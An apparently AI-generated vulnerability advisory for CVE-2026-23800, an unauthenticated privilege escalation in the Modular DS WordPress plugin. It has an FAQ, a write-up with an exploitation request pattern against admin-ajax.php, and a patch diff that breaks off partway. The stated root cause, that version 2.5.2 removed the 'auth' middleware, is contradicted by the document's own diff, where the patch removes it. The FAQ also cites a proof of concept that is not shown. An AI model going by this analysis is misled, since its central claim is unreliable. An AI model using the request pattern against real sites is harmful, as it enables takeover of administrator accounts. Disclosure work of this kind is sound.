What is CVE-2026-23800?

CVE-2026-23800 is a critical vulnerability in the Modular DS plugin for WordPress, specifically in version 2.5.2. It allows unauthenticated attackers to escalate their privileges to that of an administrator by exploiting an authentication bypass in the plugin’s API routing system.

How does the vulnerability work?

The vulnerability arises from the removal of authentication middleware, which allowed unauthenticated users to access administrative API endpoints. Attackers could send direct requests to these endpoints without needing any authentication tokens, enabling them to perform privileged actions.

Who is affected by this vulnerability?

Any WordPress site using the Modular DS plugin version 2.5.2 is at risk. Administrators should verify their plugin version to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard and look for the Modular DS plugin. If the version displayed is 2.5.2, your site is affected by this vulnerability.

How can I fix this vulnerability?

The vulnerability is patched in version 2.6.0 of the Modular DS plugin. Updating to this version will restore proper authentication checks and mitigate the risk associated with CVE-2026-23800.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Modular DS plugin until a safe update can be performed. Additionally, monitor your site for any suspicious activity and review access logs for unauthorized access.

What does the CVSS score of 9.8 mean?

A CVSS score of 9.8 indicates a critical vulnerability, suggesting that exploitation could lead to severe consequences, including complete administrative access to the site. This level of risk necessitates immediate attention and remediation.

What impact does successful exploitation have?

Exploitation of this vulnerability allows attackers to perform any administrative action on the WordPress site, including accessing sensitive information, modifying site settings, and potentially compromising the entire site.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can send crafted requests to vulnerable API endpoints without authentication. This illustrates the ease with which an unauthenticated user can exploit the vulnerability to gain administrative access.

What are the specific routes affected by this vulnerability?

The affected routes include ‘/server-information’, ‘/white-label’, ‘/cache/clear’, ‘/tree/database’, and ‘/backup/information’. These routes were previously protected but became accessible due to the removal of authentication checks.

Is there a risk of data exfiltration?

Yes, successful exploitation can lead to data exfiltration, as attackers can access sensitive server information and database structures. This poses a significant risk to the integrity and confidentiality of the site.

What should I do after updating the plugin?

After updating to the patched version, review your site’s security settings, change any compromised credentials, and monitor for any unusual activity. Regularly check for updates and security advisories related to your plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-23800: Modular DS 2.5.2 – Unauthenticated Privilege Escalation (modular-connector)

CVE ID CVE-2026-23800

Plugin modular-connector

Severity Critical (CVSS 9.8)

CWE 269

Vulnerable Version 2.5.2

Patched Version 2.6.0

Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-23800:
The Modular DS WordPress plugin version 2.5.2 contained a critical authentication bypass in its API routing system. This vulnerability allowed unauthenticated attackers to directly access administrative endpoints, leading to privilege escalation to administrator level. The flaw resided in the plugin’s custom request handling and authentication middleware.

Root Cause:
The vulnerability stemmed from the removal of the ‘auth’ route middleware from the application’s HTTP kernel in modular-connector/src/app/Http/Kernel.php. The $routeMiddleware array containing the ‘auth’ => ModularConnectorHttpMiddlewareAuthenticate::class entry was completely deleted. This removal disabled authentication enforcement for routes that previously required it. The modular-connector/src/routes/api.php file shows that routes like ‘/server-information’, ‘/white-label’, ‘/cache/clear’, ‘/tree/database’, and ‘/backup/information’ were originally protected by the Route::middleware(‘auth’) group. After the vulnerability was introduced, these routes became directly accessible without authentication checks.

Exploitation:
Attackers could exploit this by sending GET requests directly to the vulnerable endpoints without any authentication tokens. The primary attack vector was through the plugin’s API routes, which were accessible via WordPress’s standard wp-admin/admin-ajax.php handler or direct REST API calls. An attacker would craft requests to endpoints like /wp-admin/admin-ajax.php?action=modular-connector&type=request&origin=mo&mrid=[ID] targeting administrative functions such as server information retrieval, cache clearing, or backup operations. The exploitation required no special headers or authentication tokens, making it trivial for unauthenticated users to invoke privileged actions.

Patch Analysis:
The patch in version 2.6.0 completely restructured the authentication system. Instead of relying on the removed ‘auth’ middleware, the fix implemented a unified authentication approach through the AuthenticateLoopback middleware. All previously vulnerable routes in modular-connector/src/routes/api.php were updated to include the {modular_request} parameter and use the AuthenticateLoopback::class middleware. The AuthenticateLoopback.php middleware was significantly enhanced with new JWT verification logic using client_secret keys, proper request data validation, and multiple authentication methods including x-mo-authentication headers and sig parameters. The HttpUtils::isDirectRequest() method was also hardened with strict parameter validation to prevent unauthorized request types.

Impact:
Successful exploitation allowed complete administrative privilege escalation within the WordPress installation. Attackers could execute arbitrary administrative actions including retrieving sensitive server information, clearing caches, accessing database structures, obtaining backup information, and potentially modifying site configurations. This level of access could lead to complete site compromise, data exfiltration, backdoor installation, and further lateral movement within the hosting environment.

Differential between vulnerable and patched code

Code Diff

--- a/modular-connector/init.php
+++ b/modular-connector/init.php
@@ -3,7 +3,7 @@
  * Plugin Name: Modular Connector
  * Plugin URI: https://modulards.com/herramienta-gestion-webs/
  * Description: Connect and manage all your WordPress websites in an easier and more efficient way. Backups, bulk updates, Uptime Monitor, statistics, security, performance, client reports and much more.
- * Version: 2.5.2
+ * Version: 2.6.0
  * License: GPL v3.0
  * License URI: https://www.gnu.org/licenses/gpl.html
  * Requires PHP: 7.4
@@ -20,7 +20,7 @@

 define('MODULAR_CONNECTOR_BASENAME', sprintf('%s/%s', basename(dirname(__FILE__)), basename(__FILE__)));
 define('MODULAR_CONNECTOR_MU_BASENAME', sprintf('0-%s.php', dirname(MODULAR_CONNECTOR_BASENAME)));
-define('MODULAR_CONNECTOR_VERSION', '2.5.2');
+define('MODULAR_CONNECTOR_VERSION', '2.6.0');
 define('MODULAR_ARES_SCHEDULE_HOOK', 'modular_connector_run_schedule');
 define('MODULAR_CONNECTOR_STORAGE_PATH', untrailingslashit(WP_CONTENT_DIR) . DIRECTORY_SEPARATOR . 'modular_storage');
 define('MODULAR_CONNECTOR_BACKUPS_PATH', untrailingslashit(WP_CONTENT_DIR) . DIRECTORY_SEPARATOR . 'modular_backups');
--- a/modular-connector/modular-php/src/ModularClient.php
+++ b/modular-connector/modular-php/src/ModularClient.php
@@ -2,9 +2,9 @@

 namespace ModularSDK;

+use ModularConnectorFacadesServer;
 use ModularConnectorDependenciesCarbonCarbon;
 use ModularConnectorDependenciesGuzzleHttpClient;
-use ModularConnectorFacadesServer;
 use ModularSDKServicesCoreServiceFactory;
 use ModularSDKSupportApiHelper;

--- a/modular-connector/modular-php/src/Objects/BaseObject.php
+++ b/modular-connector/modular-php/src/Objects/BaseObject.php
@@ -10,6 +10,7 @@
 use ModularConnectorDependenciesIlluminateSupportFacadesDate;
 use ModularConnectorDependenciesIlluminateSupportStr;
 use ModularSDKModularClient;
+use function ModularConnectorDependenciescollect;

 class BaseObject extends BaseObjectFactory implements JsonSerializable, ArrayAccess
 {
--- a/modular-connector/modular-php/src/Services/AbstractService.php
+++ b/modular-connector/modular-php/src/Services/AbstractService.php
@@ -4,7 +4,6 @@

 use ModularSDKModularClient;
 use ModularSDKModularClientInterface;
-use ModularSDKObjectsBaseObject;
 use ModularSDKObjectsBaseObjectFactory;

 abstract class AbstractService extends BaseObjectFactory
--- a/modular-connector/src/app/Http/Controllers/BackupController.php
+++ b/modular-connector/src/app/Http/Controllers/BackupController.php
@@ -45,9 +45,10 @@
     }

     /**
+     * @param SiteRequest $modularRequest
      * @return IlluminateHttpJsonResponse
      */
-    public function getDatabaseTree()
+    public function getDatabaseTree(SiteRequest $modularRequest)
     {
         $tree = Manager::driver('database')->tree();

@@ -57,9 +58,10 @@
     /**
      * Returns the backup with the provided $payload name content if existing.
      *
+     * @param SiteRequest $modularRequest
      * @return IlluminateHttpJsonResponse
      */
-    protected function getBackupInformation()
+    protected function getBackupInformation(SiteRequest $modularRequest)
     {
         $information = Backup::information();

--- a/modular-connector/src/app/Http/Controllers/CacheController.php
+++ b/modular-connector/src/app/Http/Controllers/CacheController.php
@@ -5,11 +5,12 @@
 use ModularConnectorCacheJobsCacheClearJob;
 use ModularConnectorDependenciesIlluminateRoutingController;
 use ModularConnectorDependenciesIlluminateSupportFacadesResponse;
+use ModularSDKObjectsSiteRequest;
 use function ModularConnectorDependenciesdispatch;

 class CacheController extends Controller
 {
-    public function clear()
+    public function clear(SiteRequest $modularRequest)
     {
         dispatch(new CacheClearJob());

--- a/modular-connector/src/app/Http/Controllers/ServerController.php
+++ b/modular-connector/src/app/Http/Controllers/ServerController.php
@@ -19,9 +19,10 @@
 class ServerController extends Controller
 {
     /**
+     * @param SiteRequest $modularRequest
      * @return IlluminateHttpJsonResponse
      */
-    public function getInformation()
+    public function getInformation(SiteRequest $modularRequest)
     {
         $information = Server::information();

@@ -56,9 +57,10 @@
     }

     /**
+     * @param SiteRequest $modularRequest
      * @return IlluminateHttpJsonResponse
      */
-    public function getWhiteLabel()
+    public function getWhiteLabel(SiteRequest $modularRequest)
     {
         dispatch(fn() => WhiteLabel::forget());

--- a/modular-connector/src/app/Http/Kernel.php
+++ b/modular-connector/src/app/Http/Kernel.php
@@ -22,17 +22,6 @@
     ];

     /**
-     * The application's route middleware.
-     *
-     * These middleware may be assigned to groups or used individually.
-     *
-     * @var array
-     */
-    protected $routeMiddleware = [
-        'auth' => ModularConnectorHttpMiddlewareAuthenticate::class,
-    ];
-
-    /**
      * @param Schedule $schedule
      * @return void
      * @throws IlluminateContractsContainerBindingResolutionException
--- a/modular-connector/src/app/Http/Middleware/Authenticate.php
+++ b/modular-connector/src/app/Http/Middleware/Authenticate.php
@@ -1,79 +0,0 @@
-<?php
-
-namespace ModularConnectorHttpMiddleware;
-
-use ModularConnectorDependenciesIlluminateContractsAuthFactory as Auth;
-use ModularConnectorDependenciesIlluminateContractsAuthMiddlewareAuthenticatesRequests;
-use ModularConnectorDependenciesIlluminateHttpRequest;
-
-class Authenticate implements AuthenticatesRequests
-{
-    /**
-     * The authentication factory instance.
-     *
-     * @var IlluminateContractsAuthFactory
-     */
-    protected $auth;
-
-    /**
-     * Create a new middleware instance.
-     *
-     * @param IlluminateContractsAuthFactory $auth
-     * @return void
-     */
-    public function __construct(Auth $auth)
-    {
-        $this->auth = $auth;
-    }
-
-    /**
-     * Specify the guards for the middleware.
-     *
-     * @param string $guard
-     * @param string $others
-     * @return string
-     */
-    public static function using($guard, ...$others)
-    {
-        return static::class . ':' . implode(',', [$guard, ...$others]);
-    }
-
-    /**
-     * Handle an incoming request.
-     *
-     * @param Request $request
-     * @param Closure $next
-     * @param mixed ...$guards
-     * @return mixed
-     */
-    public function handle($request, Closure $next, ...$guards)
-    {
-        $this->authenticate($request, $guards);
-
-        return $next($request);
-    }
-
-    /**
-     * Determine if the user is logged in to any of the given guards.
-     *
-     * @param IlluminateHttpRequest $request
-     * @param array $guards
-     * @return void
-     *
-     * @throws IlluminateAuthAuthenticationException
-     */
-    protected function authenticate($request, array $guards)
-    {
-        if (empty($guards)) {
-            $guards = [null];
-        }
-
-        foreach ($guards as $guard) {
-            if ($this->auth->guard($guard)->check()) {
-                return $this->auth->shouldUse($guard);
-            }
-        }
-
-        abort(401);
-    }
-}
--- a/modular-connector/src/app/Http/Middleware/AuthenticateLoopback.php
+++ b/modular-connector/src/app/Http/Middleware/AuthenticateLoopback.php
@@ -2,10 +2,10 @@

 namespace ModularConnectorHttpMiddleware;

+use ModularConnectorHelperOauthClient;
 use ModularConnectorDependenciesAresFrameworkFoundationAuthJWT;
 use ModularConnectorDependenciesIlluminateHttpRequest;
 use ModularConnectorDependenciesIlluminateSupportFacadesLog;
-use ModularConnectorDependenciesIlluminateSupportFacadesResponse;
 use function ModularConnectorDependenciesabort;
 use function ModularConnectorDependenciesapp;

@@ -24,7 +24,22 @@
     {
         $action = app()->getScheduleHook();

-        if ($request->hasHeader('Authentication')) {
+        // Check for x-mo-Authentication header or sig parameter (API authentication with client_secret)
+        if ($request->hasHeader('x-mo-authentication') || $request->has('sig')) {
+            $token = $request->hasHeader('x-mo-authentication')
+                ? $request->header('x-mo-authentication', '')
+                : $request->get('sig');
+
+            $source = $request->hasHeader('x-mo-authentication') ? 'header' : 'parameter';
+
+            // Verify JWT with client_secret
+            if (!$this->verifyApiAuthentication($request, $token, $source)) {
+                abort(404);
+            }
+
+            Log::debug("API authentication verified successfully via {$source}");
+        } elseif ($request->hasHeader('Authentication')) {
+            // Legacy Authentication header (uses default hashing key)
             $authHeader = $request->header('Authentication', '');

             if (!JWT::verify($authHeader, $action)) {
@@ -33,9 +48,10 @@
                     'header' => $authHeader,
                 ]);

-                abort(Response::json(['error' => sprintf('Invalid JWT for %s', $action)], 403));
+                abort(404);
             }
         } else {
+            // Fallback to nonce validation
             $isValid = check_ajax_referer($action, 'nonce', false);

             if (!$isValid) {
@@ -44,10 +60,190 @@
                     'nonce' => $request->input('nonce'),
                 ]);

-                abort(Response::json(['error' => sprintf('Invalid NONCE for %s', $action)], 403));
+                abort(404);
             }
         }

+        Log::debug('Valid authentication for loopback request');
+
         return $next($request);
     }
+
+    /**
+     * Verify API authentication with client_secret.
+     *
+     * @param Request $request
+     * @param string $token JWT token from header or parameter
+     * @param string $source 'header' or 'parameter'
+     * @return bool
+     */
+    private function verifyApiAuthentication($request, $token, $source)
+    {
+        // Verify token is not empty
+        if (empty($token)) {
+            Log::debug("API auth ({$source}): Token is empty");
+            return false;
+        }
+
+        // Get client_secret from OAuth client
+        $clientSecret = OauthClient::getClient()->getClientSecret();
+
+        // If client_secret is empty, authentication is invalid
+        if (empty($clientSecret)) {
+            Log::debug("API auth ({$source}): client_secret is empty");
+            return false;
+        }
+
+        // Get request data based on route
+        $requestData = $this->getRequestData($request);
+
+        if ($requestData === null) {
+            Log::debug("API auth ({$source}): Unable to get request data");
+            return false;
+        }
+
+        // Verify JWT using client_secret with request data
+        if (!$this->verifyJwtWithData($token, $clientSecret, $requestData)) {
+            Log::debug("API auth ({$source}): Invalid JWT");
+            return false;
+        }
+
+        return true;
+    }
+
+    /**
+     * Get request data based on current route.
+     *
+     * @param Request $request
+     * @return object|array|null
+     */
+    private function getRequestData($request)
+    {
+        $routeName = $request->route()->getName();
+
+        // Special handling for OAuth route
+        if ($routeName === 'modular-connector.oauth') {
+            return (object)[
+                'code' => $request->get('code'),
+                'state' => $request->get('state'),
+            ];
+        }
+        // For other routes, get modularRequest from cache
+        $modularRequest = $request->route()->parameter('modular_request');
+
+        if (!$modularRequest) {
+            Log::debug('x-mo-Authentication: modularRequest not found in cache', [
+                'route' => $routeName,
+            ]);
+            return null;
+        }
+
+        // Validate modularRequest structure
+        $requiredKeys = [
+            'id',
+            'request_id',
+            'type',
+            'body',
+            'site_id',
+            'created_at',
+            'updated_at',
+            'deleted_at',
+            'status',
+            'expired_at',
+        ];
+
+        /**
+         * @var ModularSDKObjectsSiteRequest $modularRequest
+         */
+        foreach ($requiredKeys as $key) {
+            if (!array_key_exists($key, $modularRequest->attributesToArray())) {
+                Log::debug('x-mo-Authentication: modularRequest missing required key', [
+                    'missing_key' => $key,
+                    'route' => $routeName,
+                ]);
+
+                return null;
+            }
+        }
+
+        // Return the entire modularRequest object for hashing
+        return $modularRequest;
+    }
+
+    /**
+     * Verify JWT signature and integrity.
+     *
+     * Decodes the JWT, regenerates the signature with the same payload and client_secret,
+     * and compares. If signatures match, the JWT is authentic and unmodified.
+     *
+     * @param string $token
+     * @param string $clientSecret
+     * @param object|array $requestData
+     * @return bool
+     */
+    private function verifyJwtWithData($token, $clientSecret, $requestData)
+    {
+        // Remove Bearer prefix
+        $token = str_replace('Bearer ', '', $token);
+        $jwtParts = explode('.', $token);
+
+        if (count($jwtParts) !== 3) {
+            Log::debug('x-mo-Authentication: Invalid JWT structure');
+            return false;
+        }
+
+        [$base64UrlHeader, $base64UrlPayload, $base64UrlSignature] = $jwtParts;
+
+        // Decode header and payload to inspect them
+        $header = json_decode(JWT::base64UrlDecode($base64UrlHeader));
+        $payload = json_decode(JWT::base64UrlDecode($base64UrlPayload));
+
+        if (!$header || !$payload) {
+            Log::debug('x-mo-Authentication: Failed to decode JWT', [
+                'header_valid' => is_object($header),
+                'payload_valid' => is_object($payload),
+            ]);
+            return false;
+        }
+
+        Log::debug('x-mo-Authentication: JWT payload decoded', [
+            'client_id' => $payload->client_id ?? null,
+            'exp' => $payload->exp ?? null,
+            'iat' => $payload->iat ?? null,
+        ]);
+
+        // Regenerate signature with the exact same payload
+        // If this matches the received signature, the payload is authentic and unmodified
+        $signatureInput = "$base64UrlHeader.$base64UrlPayload";
+        $expectedSignature = hash_hmac('sha256', $signatureInput, $clientSecret, true);
+        $receivedSignature = JWT::base64UrlDecode($base64UrlSignature);
+
+        if (!hash_equals($expectedSignature, $receivedSignature)) {
+            Log::debug('x-mo-Authentication: JWT signature mismatch - token tampered or wrong secret');
+            return false;
+        }
+
+        Log::debug('x-mo-Authentication: JWT signature valid');
+
+        // Verify expiration
+        $currentTime = time();
+        if ($currentTime > ($payload->exp ?? 0)) {
+            Log::debug('x-mo-Authentication: JWT expired', [
+                'exp' => $payload->exp,
+                'now' => $currentTime,
+            ]);
+            return false;
+        }
+
+        // Verify issued at
+        if ($currentTime < ($payload->iat ?? 0)) {
+            Log::debug('x-mo-Authentication: JWT not yet valid', [
+                'iat' => $payload->iat,
+                'now' => $currentTime,
+            ]);
+            return false;
+        }
+
+        return true;
+    }
 }
--- a/modular-connector/src/app/Providers/RouteServiceProvider.php
+++ b/modular-connector/src/app/Providers/RouteServiceProvider.php
@@ -93,11 +93,7 @@
             $route = $route->bind($request);

             if ($removeQuery) {
-                $params = $route->parameterNames();
-
-                if (in_array('modular_request', $params)) {
-                    $route->setParameter('modular_request', $modularRequest);
-                }
+                $route->setParameter('modular_request', $modularRequest);
             }
         } else if ($type === 'oauth') {
             /**
--- a/modular-connector/src/routes/api.php
+++ b/modular-connector/src/routes/api.php
@@ -13,13 +13,14 @@
 use function ModularConnectorDependenciesabort;

 Route::get('/oauth', [AuthController::class, 'postConfirmOauth'])
+    ->middleware(AuthenticateLoopback::class)
     ->name('modular-connector.oauth');

 Route::get('/schedule/run', [ServerController::class, 'getLoopback'])
     ->middleware(AuthenticateLoopback::class)
     ->name('schedule.run');

-Route::middleware('auth')
+Route::middleware(AuthenticateLoopback::class)
     ->group(function () {
         Route::get('/login/{modular_request}', [AuthController::class, 'getLogin'])
             ->name('login');
@@ -27,13 +28,13 @@
         Route::get('/users/{modular_request}', [AuthController::class, 'getUsers'])
             ->name('manager.users.index');

-        Route::get('/server-information', [ServerController::class, 'getInformation'])
+        Route::get('/server-information/{modular_request}', [ServerController::class, 'getInformation'])
             ->name('manager.server.information');

         Route::get('/server-health/{modular_request}', [ServerController::class, 'getHealth'])
             ->name('manager.server.health');

-        Route::get('/white-label', [ServerController::class, 'getWhiteLabel'])
+        Route::get('/white-label/{modular_request}', [ServerController::class, 'getWhiteLabel'])
             ->name('manager.whiteLabel.update');

         Route::get('/manager/maintenance/{modular_request}', [ServerController::class, 'maintenance'])
@@ -48,7 +49,7 @@
         #endregion

         #region Cache
-        Route::get('/cache/clear', [CacheController::class, 'clear'])
+        Route::get('/cache/clear/{modular_request}', [CacheController::class, 'clear'])
             ->name('manager.cache.clear');
         #endregion

@@ -91,10 +92,10 @@
         Route::get('/tree/directory/{modular_request}', [BackupController::class, 'getDirectoryTree'])
             ->name('manager.directory.tree');

-        Route::get('/tree/database', [BackupController::class, 'getDatabaseTree'])
+        Route::get('/tree/database/{modular_request}', [BackupController::class, 'getDatabaseTree'])
             ->name('manager.database.tree');

-        Route::get('/backup/information', [BackupController::class, 'getBackupInformation'])
+        Route::get('/backup/information/{modular_request}', [BackupController::class, 'getBackupInformation'])
             ->name('manager.backup.information');

         Route::get('/backup/{modular_request}', [BackupController::class, 'store'])
@@ -108,6 +109,6 @@
             ->name('manager.woocommerce.stats');
     });

-Route::get('default/{request}', function () {
+Route::get('default/{modular_request}', function () {
     abort(404);
 })->name('default');
--- a/modular-connector/vendor/ares/framework/src/Foundation/Auth/JWT.php
+++ b/modular-connector/vendor/ares/framework/src/Foundation/Auth/JWT.php
@@ -115,6 +115,65 @@
         return $action === ModularConnectorDependenciesdata_get($payload, 'action', '');
     }
     /**
+     * Verify the validity of a JWT token with a custom key.
+     * Used for API authentication with client_secret.
+     *
+     * @param string $token The JWT token to verify.
+     * @param string $key The secret key to use for verification.
+     * @param string|null $expectedAction Optional action to verify in payload.
+     *
+     * @return bool `true` if the token is valid. `false` otherwise
+     * @throws Exception
+     */
+    public static function verifyWithKey($token, $key, $expectedAction = null)
+    {
+        if (!$token) {
+            return false;
+        }
+        // Remove Bearer prefix if present
+        if (Str::contains($token, 'Bearer')) {
+            $token = Str::replace('Bearer ', '', $token);
+        }
+        try {
+            $jwtParts = self::explodeToken($token);
+            $header = json_decode(base64_decode($jwtParts[0]));
+            $payload = json_decode(base64_decode($jwtParts[1]));
+            $signature = self::base64UrlDecode($jwtParts[2]);
+            if (!$header || !$payload) {
+                return false;
+            }
+            // Get algorithm from header
+            $alg = ModularConnectorDependenciesdata_get($header, 'alg');
+            if (!$alg || !isset(self::$SUPPORTED_ALGORITHMS[$alg])) {
+                return false;
+            }
+            // Check signature
+            $base64UrlHeader = $jwtParts[0];
+            $base64UrlPayload = $jwtParts[1];
+            if (!self::verifySignature("{$base64UrlHeader}.{$base64UrlPayload}", $signature, $key, $alg)) {
+                return false;
+            }
+            $currentTime = Carbon::now()->timestamp;
+            // Check expiration
+            $exp = ModularConnectorDependenciesdata_get($payload, 'exp', 0);
+            if ($exp && $currentTime > $exp) {
+                return false;
+            }
+            // Check issued at (not before)
+            $iat = ModularConnectorDependenciesdata_get($payload, 'iat', 0);
+            if ($iat && $currentTime < $iat) {
+                return false;
+            }
+            // Check action if provided
+            if ($expectedAction !== null) {
+                return $expectedAction === ModularConnectorDependenciesdata_get($payload, 'action', '');
+            }
+            return true;
+        } catch (Exception $e) {
+            return false;
+        }
+    }
+    /**
      * Separates into an array the different parts of a given JWT token
      *
      * @param string $token The token to explode.
@@ -137,7 +196,7 @@
      *
      * @return string       The decoded string
      */
-    private static function base64UrlDecode($input)
+    public static function base64UrlDecode($input)
     {
         $remainder = strlen($input) % 4;
         if ($remainder) {
--- a/modular-connector/vendor/ares/framework/src/Foundation/Bootloader.php
+++ b/modular-connector/vendor/ares/framework/src/Foundation/Bootloader.php
@@ -188,7 +188,6 @@
         add_action('plugins_loaded', function () use ($kernel, $request) {
             try {
                 // First, we need to search for the route to confirm if it exists and check if the modular request is valid.
-                $routes = $this->app->make('router')->getRoutes();
                 $route = apply_filters('ares/routes/match', false);
                 if (HttpUtils::isDirectRequest()) {
                     if ($route->getName() === 'wordpress') {
--- a/modular-connector/vendor/ares/framework/src/Foundation/Http/HttpUtils.php
+++ b/modular-connector/vendor/ares/framework/src/Foundation/Http/HttpUtils.php
@@ -64,17 +64,79 @@
     public static function isDirectRequest(): bool
     {
         $request = ModularConnectorDependenciesapp('request');
-        $userAgent = $request->header('User-Agent');
-        $userAgentMatches = $userAgent && Str::is('ModularConnector/* (Linux)', $userAgent);
+        // Validate that the request method is GET
+        if (!$request->isMethod('GET')) {
+            return false;
+        }
         $originQuery = $request->has('origin') && $request->get('origin') === 'mo';
-        $isFromQuery = ($originQuery || $userAgentMatches) && $request->has('type');
+        if (!$originQuery) {
+            return false;
+        }
+        $isFromQuery = $originQuery && $request->has('type');
         // When is wp-load.php request
         if ($isFromQuery) {
-            return true;
-        }
-        // TODO Now we use Laravel routes but we can't directly use the routes
-        $isFromSegment = false && $request->segment(1) === 'api' && $request->segment(2) === 'modular-connector';
-        if ($isFromSegment) {
+            // Validate allowed parameters based on type
+            $type = $request->get('type');
+            $origin = $request->get('origin');
+            $allParams = array_keys($request->query->all());
+            // Validate that type only contains allowed values
+            $allowedTypes = ['lb', 'request', 'oauth'];
+            if (!in_array($type, $allowedTypes, true)) {
+                return false;
+            }
+            // Validate that origin is exactly 'mo'
+            if ($origin !== 'mo') {
+                return false;
+            }
+            switch ($type) {
+                case 'request':
+                    $allowedParams = ['origin', 'type', 'mrid', 'sig'];
+                    break;
+                case 'lb':
+                    $allowedParams = ['origin', 'type', 'nonce'];
+                    break;
+                case 'oauth':
+                    $allowedParams = ['origin', 'code', 'type', 'state'];
+                    break;
+                default:
+                    return false;
+            }
+            // Check if all parameters are allowed
+            foreach ($allParams as $param) {
+                if (!in_array($param, $allowedParams, true)) {
+                    return false;
+                }
+            }
+            // Validate that parameters are not empty (except state)
+            foreach ($allParams as $param) {
+                if ($param === 'state') {
+                    continue;
+                }
+                $value = $request->get($param);
+                if ($value === null || $value === '') {
+                    return false;
+                }
+            }
+            // Validate that sig parameter and x-mo-Authentication header are mutually exclusive
+            $hasSigParam = $request->has('sig');
+            $hasAuthHeader = $request->hasHeader('x-mo-authentication');
+            if ($hasSigParam && $hasAuthHeader) {
+                return false;
+            }
+            // Validate required headers for oauth type
+            if ($type === 'oauth') {
+                if (!$request->hasHeader('x-mo-authentication')) {
+                    return false;
+                }
+            }
+            // Validate required header or parameter for lb type
+            if ($type === 'lb') {
+                $hasAuthHeader = $request->hasHeader('Authentication');
+                $hasNonceParam = $request->has('nonce');
+                if (!$hasAuthHeader && !$hasNonceParam) {
+                    return false;
+                }
+            }
             return true;
         }
         return false;
--- a/modular-connector/vendor/ares/framework/src/Foundation/ScreenSimulation.php
+++ b/modular-connector/vendor/ares/framework/src/Foundation/ScreenSimulation.php
@@ -105,11 +105,6 @@
             $GLOBALS['hook_suffix'] = '';
         }
         $this->forceCompability();
-        // Force login as admin.
-        add_action('plugins_loaded', function () {
-            // Many premium plugins require the user to be logged in as an admin to detect the license.
-            ServerSetup::loginAs();
-        }, 1);
         if (HttpUtils::isMuPlugin()) {
             $this->loadAdmin();
         }
--- a/modular-connector/vendor/composer/autoload_classmap.php
+++ b/modular-connector/vendor/composer/autoload_classmap.php
@@ -2271,7 +2271,6 @@
     'Modular\Connector\Http\Controllers\ServerController' => $baseDir . '/src/app/Http/Controllers/ServerController.php',
     'Modular\Connector\Http\Controllers\WooCommerceController' => $baseDir . '/src/app/Http/Controllers/WooCommerceController.php',
     'Modular\Connector\Http\Kernel' => $baseDir . '/src/app/Http/Kernel.php',
-    'Modular\Connector\Http\Middleware\Authenticate' => $baseDir . '/src/app/Http/Middleware/Authenticate.php',
     'Modular\Connector\Http\Middleware\AuthenticateLoopback' => $baseDir . '/src/app/Http/Middleware/AuthenticateLoopback.php',
     'Modular\Connector\Jobs\ConfigureDriversJob' => $baseDir . '/src/app/Jobs/ConfigureDriversJob.php',
     'Modular\Connector\Jobs\Health\ManagerHealthDataJob' => $baseDir . '/src/app/Jobs/Health/ManagerHealthDataJob.php',
--- a/modular-connector/vendor/composer/autoload_files.php
+++ b/modular-connector/vendor/composer/autoload_files.php
@@ -6,25 +6,25 @@
 $baseDir = dirname($vendorDir);

 return array(
-    '3be3930930d4833e9170bb96a98017ed' => $vendorDir . '/symfony/polyfill-php80/bootstrap.php',
-    '57776b6b937d151aa09700e58bc43ff7' => $vendorDir . '/symfony/polyfill-mbstring/bootstrap.php',
-    '47362306d406d3d5f750b39a76472c36' => $vendorDir . '/symfony/deprecation-contracts/function.php',
-    '5ae20ab1b22decfcdf1ec8cf5cb0c6df' => $vendorDir . '/illuminate/collections/helpers.php',
-    '5b0ac2d5c681c57f19727b3f84f240f6' => $vendorDir . '/symfony/translation/Resources/functions.php',
-    '6ecf50c74684d51e775de2f58a75568d' => $vendorDir . '/illuminate/support/helpers.php',
-    'd7477911cd049bbd22fc06886adcd76a' => $vendorDir . '/symfony/polyfill-ctype/bootstrap.php',
-    'da3333cb928bd72afb37c8655e4b0dc4' => $vendorDir . '/symfony/polyfill-php73/bootstrap.php',
-    'be46ff9416c6039edf2c9e9d0f073bc7' => $vendorDir . '/symfony/polyfill-intl-normalizer/bootstrap.php',
-    'cd924b8b8867bdf5cb30ea3d1fda7877' => $vendorDir . '/symfony/var-dumper/Resources/functions/dump.php',
-    '96e6be4dee482c433db35007e272ccb1' => $vendorDir . '/symfony/polyfill-intl-grapheme/bootstrap.php',
-    'e6d623430cf9dfede21ce0afb13fc0d5' => $vendorDir . '/symfony/string/Resources/functions.php',
-    '6595570c01f6b61275f965dd5f61dc9e' => $vendorDir . '/symfony/polyfill-intl-idn/bootstrap.php',
-    '5b10ea17a66c57c2dec9163991a14bfe' => $vendorDir . '/symfony/polyfill-php81/bootstrap.php',
-    'e9263394afb0f5bb487acaa8ed5a379c' => $vendorDir . '/illuminate/events/functions.php',
-    '2159037f38ede778c62d6f26243fd889' => $vendorDir . '/opis/closure/functions.php',
-    '96012c69e36abd148dd6e21fe7da2fca' => $vendorDir . '/ralouphie/getallheaders/src/getallheaders.php',
-    'dcf98500ad62a9796e6d807dd200c4ad' => $vendorDir . '/ramsey/uuid/src/functions.php',
-    'f0a9f602b56a7514b8a4ae31dad26396' => $vendorDir . '/ares/framework/src/helpers.php',
-    '5d00439f4bfea78f75490a2b73529178' => $vendorDir . '/ares/framework/illuminate/Foundation/helpers.php',
-    '39aca1ab5f5b45f7014527f1ffae03c8' => $vendorDir . '/guzzlehttp/guzzle/src/functions_include.php',
+    'be0e863a0b7d410051e3679684b89d05' => $vendorDir . '/symfony/polyfill-php80/bootstrap.php',
+    'cdccba37285717201be0cda22130b7c1' => $vendorDir . '/symfony/polyfill-mbstring/bootstrap.php',
+    '4da8a5f965edcd26473fcbf2be82d7d7' => $vendorDir . '/symfony/deprecation-contracts/function.php',
+    '5d7599fb41d4880e3bb858d832901e9a' => $vendorDir . '/illuminate/collections/helpers.php',
+    '91ee1bbb29b3989967f6f8639a6d635d' => $vendorDir . '/symfony/translation/Resources/functions.php',
+    'b72b50162266450392ddd5c515a75818' => $vendorDir . '/illuminate/support/helpers.php',
+    '9f49441cfe0691e56c9c67bd097c4350' => $vendorDir . '/symfony/polyfill-ctype/bootstrap.php',
+    '2754c0fa2f40527b67501543ab0dae51' => $vendorDir . '/symfony/polyfill-php73/bootstrap.php',
